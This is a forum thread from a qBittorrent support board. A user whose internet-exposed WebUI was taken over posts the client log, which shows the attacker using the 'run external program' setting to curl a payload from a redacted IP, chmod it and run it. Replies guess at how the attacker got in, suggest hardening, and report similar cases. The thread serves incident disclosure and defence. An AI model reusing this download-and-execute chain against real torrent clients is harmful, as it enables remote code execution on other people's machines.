WebUI login without password exploit

katiedaydream

WebUI login without password exploit

Post by katiedaydream »

Hi all,

So I had my home server's qbittorrent (4.3.5) WebUI exposed externally through UPnP, because I'm careless, and it got exploited. I'm kind of lost as to why though; the logs only provide enough detail to show that they were able to log in directly without brute forcing a password, as there had been no failed logins. I did grep through all the logs.

Exploit went as follows:
1. Successful login from external IP... Somehow...
2. Remove all existing torrents (yay for backed up .torrent files)
3. Change "Run external program on torrent completion" to a curl command that downloaded a payload, then add a dummy torrent
4. Change external command to chmod 777 the payload, remove and re-add the torrent
5. Change external command to the payload itself, remove and re-add

Also they changed the WebUI password just to be a shit.

I'm not exceptionally dumb, and my qbittorrent was not running elevated. I also got lucky; even if it contained some privilege escalation exploit, the payload was x86 and I'm running on ARM.

Still kind of concerning that there's some exploit to log in without needing the password, since there are many users that access without an ssh tunnel, as that is the default config.
Worth noting, maybe, is that I have authentication bypassed for the 192.168.1.0/24 subnet, but the connection was from an external IP anyway.

I've redacted some stuff in the log, mainly so nobody goes and downloads the payload themselves. If you are skilled in reverse engineering binaries and want to dig into the payload, let me know. I'm going to try myself when I have some time anyway, but I'm kinda bad at it.

qbittorrent.log

(I) 2021-11-13T07:15:03 - UPnP/NAT-PMP: Port mapping successful, message: successfully mapped port using NAT-PMP. external port: TCP/21903
(I) 2021-11-13T07:15:03 - UPnP/NAT-PMP: Port mapping successful, message: successfully mapped port using NAT-PMP. external port: UDP/21903
(I) 2021-11-13T07:15:04 - UPnP/NAT-PMP: Port mapping successful, message: successfully mapped port using NAT-PMP. external port: TCP/8080
(N) 2021-11-13T07:37:04 - WebAPI login success. IP: ::ffff:(redacted external ip)
(N) 2021-11-13T07:37:05 - Web UI: Now listening on IP: *, port: 8080
(N) 2021-11-13T07:37:05 - '(redacted torrent)' was removed from the transfer list.
...
(every torrent gets removed)
...
(N) 2021-11-13T07:37:06 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' added to download list.
(N) 2021-11-13T07:37:22 - Torrent: Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village, running external program, command: curl http://(redacted ip):8000/i386 --output /tmp/t
(N) 2021-11-13T07:37:27 - Web UI: Now listening on IP: *, port: 8080
(N) 2021-11-13T07:37:27 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' was removed from the transfer list.
(N) 2021-11-13T07:37:28 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' added to download list.
(N) 2021-11-13T07:37:29 - Torrent: Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village, running external program, command: chmod 777 /tmp/t
(N) 2021-11-13T07:37:49 - Web UI: Now listening on IP: *, port: 8080
(N) 2021-11-13T07:37:49 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' was removed from the transfer list.
(N) 2021-11-13T07:37:50 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' added to download list.
(N) 2021-11-13T07:37:52 - Torrent: Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village, running external program, command: /tmp/t

readelf -h /tmp/t

ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x80a7020
  Start of program headers:          52 (bytes into file)
  Start of section headers:          276 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         7
  Size of section headers:           40 (bytes)
  Number of section headers:         14
  Section header string table index: 3
Peter
Administrator
Posts: 2693
Joined: Wed Jul 07, 2010 6:14 pm

Re: WebUI login without password exploit

Post by Peter »

Hmm, that is extremely interesting...

I am not sure about the exact changes since 4.3.5 but 4.3.9 has a LOT of security options for WebUI.
You can try posting this over here as well: https://github.com/qbittorrent/qBittorrent/issues

Though I am not sure if there is anything to investigate, minus the payload.
- Check the IP, hostname
- Check when the hack happened (timezones, etc)
- Usually, you can simply use a tool to identify a program's compiler, then find a decompiler. I doubt these "hackers" would actually be able to code a proper application.
GlitterTile

Re: WebUI login without password exploit

Post by GlitterTile »

I noticed some parts of your setup are easily guessed. IP range: 192.168.1.0/24, port: 8080.
Also you said login to the WebUI is not required when accessed locally.

We may never know how they got in, but one theory I have is that you visited a site (perhaps one that attracts torrent users) that had an iframe which accessed your local qbittorrent WebUI by attempting 192.168.0.1:8080 through to 192.168.1.255:8080. As this is internal, it does not require login. This would change the login credentials for the WebUI. The website with this code would already know your external IP, so it could easily connect to the same external IP on common ports such as 8080, attempting the new login credentials.

I would imagine a setup like this on a torrent site would be frequently successful.

If this is the case, then requiring login internally would end this; additionally, using a random port would make this harder.

Is it possible you can check any logs for sites you were visiting at the time you were attacked?

I would also think it would be wise for qbittorrent to have the option to execute external programs disabled by default, and only possible to enable externally (e.g. via the config file), as this feature is so dangerous.
katiedaydream

Re: WebUI login without password exploit

Post by katiedaydream »

@GlitterTile's suggestion seems more likely than there being an exploit honestly, but I can't confirm whether that's the case either.
I don't keep logs of network traffic, and I have roommates, so that's not really something I can rule out. Although at least my own browsing history seems clean and I would have been the only one awake at the time. Still, the breach could have happened earlier.

FWIW one roommate had a public-facing Nextcloud server that I looked through the logs of. There was an access from the attacker's IP around the same time, but it seemed to just be an attempt at an exploit using some junk HTTP headers, all of which Apache rejected with 400s.

I can't confirm that they accessed it through the local side first, since it looks like qbit doesn't log accesses from the whitelisted subnet.

I'd rather not throw an issue up when I don't have a reproducible bug to report. But I agree maybe there could be something done about the ease of code execution. I'll make a post.

As for the payload, the full ELF headers make it clear it was written in Go, for which no decompiler exists, but there's always generic x86 disassembly.
katiedaydream

Re: WebUI login without password exploit

Post by katiedaydream »

Well this is pretty depressing... I'm definitely not well versed enough to figure out exactly what the payload is supposed to do, but it does seem to be built to spam a bunch of hateful emails about a handful of people. So not even something it would have needed root for.
One email was pretty personally hurtful, since I happen to belong to the targeted minority. So that's me emotionally wrecked for the night.
oof666ohno

Re: WebUI login without password exploit

Post by oof666ohno »

This issue is still ongoing and is also affecting the Transmission and Deluge torrent clients.

I did not even have the local side whitelisted. There were no failed login attempts and I didn't have ports forwarded in my router.

https://www.reddit.com/r/truenas/commen ... nt_plugin/
https://www.reddit.com/r/qBittorrent/co ... nts_added/
https://community.synology.com/enu/forum/1/post/151239
https://forum.transmissionbt.com/viewto ... 8649b1bbb4
Peter
Administrator

Re: WebUI login without password exploit

Post by Peter »

If anyone has info on this or this happened to them, please check the Github Issue Tracker and comment/open a ticket.
Please double-check if there is an existing ticket about this.
Thank you!

https://github.com/qbittorrent/qBittorrent/issues